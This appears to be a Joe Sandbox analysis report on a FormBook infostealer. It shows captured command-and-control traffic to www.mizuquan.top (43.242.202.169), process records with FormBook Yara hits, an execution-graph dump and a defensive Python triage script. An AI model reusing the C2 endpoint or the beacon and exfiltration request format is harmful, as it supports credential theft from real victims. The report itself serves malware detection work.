                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID: 30 | Source IP: 192.168.2.4 | Source Port: 50038 | Destination IP: 43.242.202.169 | Destination Port: 80 | PID: 2844
                                                                        Process: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp: Oct 8, 2024 16:36:18.184499025 CEST | Bytes transferred: 832 | Direction: OUT
                                                                        POST /e0nr/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.mizuquan.top
                                                                        Origin: http://www.mizuquan.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.mizuquan.top/e0nr/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Ascii: -NnllVvH=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYUxFGI3zppOG9948rpwU3vd4e7Vw7f8Hkg=
                                                                        Timestamp: Oct 8, 2024 16:36:19.053726912 CEST | Bytes transferred: 691 | Direction: IN
                                                                        HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:36:18 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID: 31 | Source IP: 192.168.2.4 | Source Port: 50039 | Destination IP: 43.242.202.169 | Destination Port: 80 | PID: 2844
                                                                        Process: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp: Oct 8, 2024 16:36:20.728841066 CEST | Bytes transferred: 10914 | Direction: OUT
                                                                        POST /e0nr/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.mizuquan.top
                                                                        Origin: http://www.mizuquan.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.mizuquan.top/e0nr/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Ascii: -NnllVvH= [TRUNCATED]
                                                                        Timestamp: Oct 8, 2024 16:36:21.606004000 CEST | Bytes transferred: 691 | Direction: IN
                                                                        HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:36:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 50040 | Destination IP: 43.242.202.169 | Destination Port: 80 | PID: 2844
                                                                        Process: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp: Oct 8, 2024 16:36:23.290067911 CEST | Bytes transferred: 555 | Direction: OUT
                                                                        GET /e0nr/?-NnllVvH=K/5K1kUHGJjjXPw2ZEkIjVgmoRaszrgI6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txK3JHWMG30o4pyFBBCDSCP6CBkBrnoqSCbT0=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.mizuquan.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Timestamp: Oct 8, 2024 16:36:24.174876928 CEST | Bytes transferred: 691 | Direction: IN
                                                                        HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:36:24 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 548
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->



                                                                        Target ID:0
                                                                        Start time:10:33:22
                                                                        Start date:08/10/2024
                                                                        Path:C:\Users\user\Desktop\fJD7ivEnzm.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\fJD7ivEnzm.exe"
                                                                        Imagebase:0x400000
                                                                        File size:1'393'415 bytes
                                                                        MD5 hash:46BB75D27887B28474A3EB4570D89CA5
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:10:33:23
                                                                        Start date:08/10/2024
                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\fJD7ivEnzm.exe"
                                                                        Imagebase:0x4e0000
                                                                        File size:46'504 bytes
                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:10:33:36
                                                                        Start date:08/10/2024
                                                                        Path:C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe"
                                                                        Imagebase:0xf0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:6
                                                                        Start time:10:33:39
                                                                        Start date:08/10/2024
                                                                        Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                        Imagebase:0x350000
                                                                        File size:22'016 bytes
                                                                        MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:7
                                                                        Start time:10:33:51
                                                                        Start date:08/10/2024
                                                                        Path:C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe"
                                                                        Imagebase:0xf0000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:8
                                                                        Start time:10:34:13
                                                                        Start date:08/10/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff6bf500000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true
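The three process records above show the two launch patterns an analyst should pull out of a FormBook report: a 32-bit binary from a system directory (Target 6, netbtugc.exe) started with a bare command line and carrying FormBook Yara hits in its memory, and a persistence copy under a randomly named Program Files (x86) directory (Target 7). The script below is an added triage example, not part of the Joe Sandbox report and not Joe Security's code. It parses the report's own Key:Value record format (the sample input is constructed from Targets 6, 7 and 8 as printed above) and tags those two patterns; the length and entropy thresholds, the tag names and the directory prefixes are this example's assumptions. It scores only the launch pattern: the reported MD5 of netbtugc.exe still has to be compared against a known-good copy to tell a hollowed system binary from a renamed payload.

```python
"""Added triage example (not Joe Sandbox code): flag FormBook-style process
records from a Joe Sandbox report.  Thresholds and tag names are assumptions."""
import math
import re
from dataclasses import dataclass, field

# Constructed from the report's Target 6, 7 and 8 records shown above.
REPORT_RECORDS = r"""
Target ID:6
Path:C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:false

Target ID:7
Path:C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe"
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has exited:false

Target ID:8
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has exited:true
"""

# Assumed directory prefixes (lower-cased for comparison).
SYSTEM_DIRS = ("c:\\windows\\syswow64\\", "c:\\windows\\system32\\")
PROGRAM_DIRS = ("c:\\program files (x86)\\", "c:\\program files\\")


def parse_records(text: str) -> list[dict]:
    """Split the report text into records (blank-line separated) of Key:Value
    lines; Yara bullet lines are reduced to the matched rule names."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec: dict = {"Yara rules": []}
        for line in chunk.splitlines():
            line = line.strip()
            if line.startswith("•"):
                m = re.search(r"Rule:\s*([^,]+)", line)
                if m:
                    rec["Yara rules"].append(m.group(1))
            elif ":" in line:
                key, value = line.split(":", 1)  # split on the first colon only
                rec[key.strip()] = value.strip()
        records.append(rec)
    return records


def shannon_entropy(s: str) -> float:
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def looks_random(name: str, min_len: int = 24, min_entropy: float = 3.5) -> bool:
    """Assumed heuristic: long, letters-only, mixed-case, high-entropy names.
    A real vendor folder such as 'Mozilla Firefox' fails the letters-only test."""
    return (len(name) >= min_len and name.isalpha()
            and name != name.lower() and name != name.upper()
            and shannon_entropy(name) >= min_entropy)


@dataclass
class Finding:
    target_id: str
    path: str
    tags: list = field(default_factory=list)
    yara_rules: list = field(default_factory=list)


def triage(text: str) -> list[Finding]:
    findings = []
    for rec in parse_records(text):
        path = rec.get("Path", "")
        low = path.lower()
        cmd = rec.get("Commandline", "").strip().strip('"').lower()
        f = Finding(rec.get("Target ID", "?"), path, yara_rules=rec["Yara rules"])
        # System binary launched with nothing but its own path: injection host pattern.
        if low.startswith(SYSTEM_DIRS) and cmd == low:
            f.tags.append("bare_system_binary")
        # First directory component under Program Files looks machine-generated.
        for prefix in PROGRAM_DIRS:
            if low.startswith(prefix):
                top_dir = path[len(prefix):].split("\\", 1)[0]
                if looks_random(top_dir):
                    f.tags.append("random_program_files_dir")
                break
        if any("formbook" in r.lower() for r in f.yara_rules):
            f.tags.append("yara_formbook")
        if f.tags:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(REPORT_RECORDS):
        print(f"Target {f.target_id}: {', '.join(f.tags)}  <- {f.path}")
```

Run as-is it reports Target 6 as a bare system binary with FormBook Yara hits and Target 7 as a random-directory persistence copy; Firefox (Target 8) produces no finding. The same parser works on any block of Joe Sandbox process records pasted from a report.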


                                                                          Execution Graph

                                                                          Execution Coverage:3.3%
                                                                          Dynamic/Decrypted Code Coverage:1%
                                                                          Signature Coverage:4.2%
                                                                          Total number of Nodes:1893
                                                                          Total number of Limit Nodes:36
                                                                          execution_graph: the serialized node and edge list behind the interactive graph view (the 1893 nodes counted above) is not reproduced here. What is recoverable from it: one root is a window procedure at 0x4010e0 (DefWindowProcW, Shell_NotifyIconW, SetTimer/KillTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage), another is C runtime start-up at 0x416454 (GetStartupInfoW, HeapCreate, GetCommandLineW, GetEnvironmentStringsW, TlsAlloc, InitializeCriticalSectionAndSpinCount), and the main-window path at 0x40d590 performs the IsDebuggerPresent check that leads to MessageBoxA, matching the debugger-check signature listed in the overview.
                                                                          Other API nodes in the graph: RegOpenKeyExW/RegQueryValueExW/RegCloseKey, GetModuleFileNameW, GetFullPathNameW, GetCurrentDirectoryW/SetCurrentDirectoryW, LoadLibraryA/GetProcAddress/FreeLibrary, SetUnhandledExceptionFilter/UnhandledExceptionFilter, GetOpenFileNameW, SHGetMalloc, GetForegroundWindow, ShellExecuteW, RegisterClassExW, LoadImageW, EnumResourceNamesW, CreateWindowExW, ShowWindow, PeekMessageW/GetMessageW/TranslateMessage/DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, timeGetTime, Sleep, SystemParametersInfoW, WideCharToMultiByte, VariantClear, RtlAllocateHeap/HeapAlloc/RtlFreeHeap, RaiseException, ExitProcess and GetCurrentProcess/TerminateProcess.
4154a5 EnterCriticalSection 85323->85325 85324->85325 85326 41548b 85324->85326 85328 415117 85325->85328 85327 4182cb __lock 46 API calls 85326->85327 85327->85328 85329 415047 85328->85329 85330 415067 85329->85330 85331 415057 85329->85331 85336 415079 85330->85336 85344 414e4e 85330->85344 85399 417f77 46 API calls __getptd_noexit 85331->85399 85335 41505c 85343 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 85335->85343 85361 41443c 85336->85361 85339 4150b9 85374 41e1f4 85339->85374 85341->85315 85342->85322 85343->85322 85345 414e61 85344->85345 85346 414e79 85344->85346 85400 417f77 46 API calls __getptd_noexit 85345->85400 85348 414139 __ftell_nolock 46 API calls 85346->85348 85350 414e80 85348->85350 85349 414e66 85401 417f25 10 API calls ___crtsetenv 85349->85401 85352 41e1f4 __write 51 API calls 85350->85352 85353 414e97 85352->85353 85354 414f09 85353->85354 85356 414ec9 85353->85356 85360 414e71 85353->85360 85402 417f77 46 API calls __getptd_noexit 85354->85402 85357 41e1f4 __write 51 API calls 85356->85357 85356->85360 85358 414f64 85357->85358 85359 41e1f4 __write 51 API calls 85358->85359 85358->85360 85359->85360 85360->85336 85362 414455 85361->85362 85366 414477 85361->85366 85363 414139 __ftell_nolock 46 API calls 85362->85363 85362->85366 85364 414470 85363->85364 85403 41b7b2 77 API calls 5 library calls 85364->85403 85367 414139 85366->85367 85368 414145 85367->85368 85369 41415a 85367->85369 85404 417f77 46 API calls __getptd_noexit 85368->85404 85369->85339 85371 41414a 85405 417f25 10 API calls ___crtsetenv 85371->85405 85373 414155 85373->85339 85375 41e200 __read 85374->85375 85376 41e223 85375->85376 85377 41e208 85375->85377 85378 41e22f 85376->85378 85383 41e269 85376->85383 85426 417f8a 46 API calls __getptd_noexit 85377->85426 85428 417f8a 46 API calls __getptd_noexit 85378->85428 85381 41e20d 85427 417f77 46 API calls __getptd_noexit 85381->85427 85382 41e234 85429 417f77 46 API calls __getptd_noexit 85382->85429 85406 
41ae56 85383->85406 85387 41e215 __read 85387->85335 85388 41e23c 85430 417f25 10 API calls ___crtsetenv 85388->85430 85389 41e26f 85391 41e291 85389->85391 85392 41e27d 85389->85392 85431 417f77 46 API calls __getptd_noexit 85391->85431 85416 41e17f 85392->85416 85395 41e296 85432 417f8a 46 API calls __getptd_noexit 85395->85432 85396 41e289 85433 41e2c0 LeaveCriticalSection __unlock_fhandle 85396->85433 85399->85335 85400->85349 85401->85360 85402->85360 85403->85366 85404->85371 85405->85373 85407 41ae62 __read 85406->85407 85408 41aebc 85407->85408 85411 4182cb __lock 46 API calls 85407->85411 85409 41aec1 EnterCriticalSection 85408->85409 85410 41aede __read 85408->85410 85409->85410 85410->85389 85412 41ae8e 85411->85412 85413 41aeaa 85412->85413 85414 41ae97 InitializeCriticalSectionAndSpinCount 85412->85414 85415 41aeec ___lock_fhandle LeaveCriticalSection 85413->85415 85414->85413 85415->85408 85417 41aded __lseeki64_nolock 46 API calls 85416->85417 85418 41e18e 85417->85418 85419 41e1a4 SetFilePointer 85418->85419 85420 41e194 85418->85420 85422 41e1bb GetLastError 85419->85422 85423 41e1c3 85419->85423 85421 417f77 ___crtsetenv 46 API calls 85420->85421 85424 41e199 85421->85424 85422->85423 85423->85424 85425 417f9d __dosmaperr 46 API calls 85423->85425 85424->85396 85425->85424 85426->85381 85427->85387 85428->85382 85429->85388 85430->85387 85431->85395 85432->85396 85433->85387 85435 4149ea 85434->85435 85436 4149fe 85434->85436 85480 417f77 46 API calls __getptd_noexit 85435->85480 85438 4149fa 85436->85438 85440 41443c __flush 77 API calls 85436->85440 85452 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 85438->85452 85439 4149ef 85481 417f25 10 API calls ___crtsetenv 85439->85481 85442 414a0a 85440->85442 85453 41d8c2 85442->85453 85445 414139 __ftell_nolock 46 API calls 85446 414a18 85445->85446 85457 41d7fe 85446->85457 85448 414a1e 85448->85438 85449 413748 _free 46 API calls 85448->85449 85449->85438 85450->85183 85451->85186 
85452->85186 85454 414a12 85453->85454 85455 41d8d2 85453->85455 85454->85445 85455->85454 85456 413748 _free 46 API calls 85455->85456 85456->85454 85458 41d80a __read 85457->85458 85459 41d812 85458->85459 85460 41d82d 85458->85460 85497 417f8a 46 API calls __getptd_noexit 85459->85497 85461 41d839 85460->85461 85466 41d873 85460->85466 85499 417f8a 46 API calls __getptd_noexit 85461->85499 85464 41d817 85498 417f77 46 API calls __getptd_noexit 85464->85498 85465 41d83e 85500 417f77 46 API calls __getptd_noexit 85465->85500 85469 41ae56 ___lock_fhandle 48 API calls 85466->85469 85471 41d879 85469->85471 85470 41d846 85501 417f25 10 API calls ___crtsetenv 85470->85501 85473 41d893 85471->85473 85474 41d887 85471->85474 85502 417f77 46 API calls __getptd_noexit 85473->85502 85482 41d762 85474->85482 85477 41d81f __read 85477->85448 85478 41d88d 85503 41d8ba LeaveCriticalSection __unlock_fhandle 85478->85503 85480->85439 85481->85438 85504 41aded 85482->85504 85484 41d7c8 85517 41ad67 47 API calls 2 library calls 85484->85517 85486 41d772 85486->85484 85488 41aded __lseeki64_nolock 46 API calls 85486->85488 85496 41d7a6 85486->85496 85487 41aded __lseeki64_nolock 46 API calls 85490 41d7b2 CloseHandle 85487->85490 85489 41d79d 85488->85489 85492 41aded __lseeki64_nolock 46 API calls 85489->85492 85490->85484 85493 41d7be GetLastError 85490->85493 85491 41d7d0 85495 41d7f2 85491->85495 85518 417f9d 46 API calls 3 library calls 85491->85518 85492->85496 85493->85484 85495->85478 85496->85484 85496->85487 85497->85464 85498->85477 85499->85465 85500->85470 85501->85477 85502->85478 85503->85477 85505 41ae12 85504->85505 85506 41adfa 85504->85506 85509 417f8a __read 46 API calls 85505->85509 85512 41ae51 85505->85512 85507 417f8a __read 46 API calls 85506->85507 85508 41adff 85507->85508 85510 417f77 ___crtsetenv 46 API calls 85508->85510 85511 41ae23 85509->85511 85514 41ae07 85510->85514 85513 417f77 ___crtsetenv 46 API calls 85511->85513 85512->85486 85515 41ae2b 
85513->85515 85514->85486 85516 417f25 ___crtsetenv 10 API calls 85515->85516 85516->85514 85517->85491 85518->85495 85520 414c82 __read 85519->85520 85521 414cc3 85520->85521 85522 414c96 __wctomb_s_l 85520->85522 85523 414cbb __read 85520->85523 85524 415471 __lock_file 47 API calls 85521->85524 85546 417f77 46 API calls __getptd_noexit 85522->85546 85523->85193 85525 414ccb 85524->85525 85532 414aba 85525->85532 85528 414cb0 85547 417f25 10 API calls ___crtsetenv 85528->85547 85535 414ad8 __wctomb_s_l 85532->85535 85537 414af2 85532->85537 85533 414ae2 85599 417f77 46 API calls __getptd_noexit 85533->85599 85535->85533 85535->85537 85542 414b2d 85535->85542 85548 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 85537->85548 85539 414c38 __wctomb_s_l 85602 417f77 46 API calls __getptd_noexit 85539->85602 85540 414139 __ftell_nolock 46 API calls 85540->85542 85542->85537 85542->85539 85542->85540 85549 41dfcc 85542->85549 85579 41d8f3 85542->85579 85601 41e0c2 46 API calls 3 library calls 85542->85601 85545 414ae7 85600 417f25 10 API calls ___crtsetenv 85545->85600 85546->85528 85547->85523 85548->85523 85550 41dfd8 __read 85549->85550 85551 41dfe0 85550->85551 85552 41dffb 85550->85552 85672 417f8a 46 API calls __getptd_noexit 85551->85672 85554 41e007 85552->85554 85557 41e041 85552->85557 85674 417f8a 46 API calls __getptd_noexit 85554->85674 85555 41dfe5 85673 417f77 46 API calls __getptd_noexit 85555->85673 85560 41e063 85557->85560 85561 41e04e 85557->85561 85559 41e00c 85675 417f77 46 API calls __getptd_noexit 85559->85675 85565 41ae56 ___lock_fhandle 48 API calls 85560->85565 85677 417f8a 46 API calls __getptd_noexit 85561->85677 85563 41e014 85676 417f25 10 API calls ___crtsetenv 85563->85676 85567 41e069 85565->85567 85566 41e053 85678 417f77 46 API calls __getptd_noexit 85566->85678 85571 41e077 85567->85571 85572 41e08b 85567->85572 85570 41dfed __read 85570->85542 85603 41da15 85571->85603 85679 417f77 46 API calls __getptd_noexit 
85572->85679 85575 41e083 85681 41e0ba LeaveCriticalSection __unlock_fhandle 85575->85681 85576 41e090 85680 417f8a 46 API calls __getptd_noexit 85576->85680 85580 41d900 85579->85580 85584 41d915 85579->85584 85685 417f77 46 API calls __getptd_noexit 85580->85685 85582 41d905 85686 417f25 10 API calls ___crtsetenv 85582->85686 85585 41d94a 85584->85585 85592 41d910 85584->85592 85682 420603 85584->85682 85587 414139 __ftell_nolock 46 API calls 85585->85587 85588 41d95e 85587->85588 85589 41dfcc __read 59 API calls 85588->85589 85590 41d965 85589->85590 85591 414139 __ftell_nolock 46 API calls 85590->85591 85590->85592 85593 41d988 85591->85593 85592->85542 85593->85592 85594 414139 __ftell_nolock 46 API calls 85593->85594 85595 41d994 85594->85595 85595->85592 85596 414139 __ftell_nolock 46 API calls 85595->85596 85597 41d9a1 85596->85597 85598 414139 __ftell_nolock 46 API calls 85597->85598 85598->85592 85599->85545 85600->85537 85601->85542 85602->85545 85604 41da31 85603->85604 85605 41da4c 85603->85605 85606 417f8a __read 46 API calls 85604->85606 85607 41da5b 85605->85607 85609 41da7a 85605->85609 85608 41da36 85606->85608 85610 417f8a __read 46 API calls 85607->85610 85611 417f77 ___crtsetenv 46 API calls 85608->85611 85613 41da98 85609->85613 85625 41daac 85609->85625 85612 41da60 85610->85612 85626 41da3e 85611->85626 85616 417f77 ___crtsetenv 46 API calls 85612->85616 85614 417f8a __read 46 API calls 85613->85614 85617 41da9d 85614->85617 85615 41db02 85619 417f8a __read 46 API calls 85615->85619 85618 41da67 85616->85618 85621 417f77 ___crtsetenv 46 API calls 85617->85621 85622 417f25 ___crtsetenv 10 API calls 85618->85622 85620 41db07 85619->85620 85623 417f77 ___crtsetenv 46 API calls 85620->85623 85624 41daa4 85621->85624 85622->85626 85623->85624 85628 417f25 ___crtsetenv 10 API calls 85624->85628 85625->85615 85625->85626 85627 41dae1 85625->85627 85629 41db1b 85625->85629 85626->85575 85627->85615 85632 41daec ReadFile 85627->85632 85628->85626 
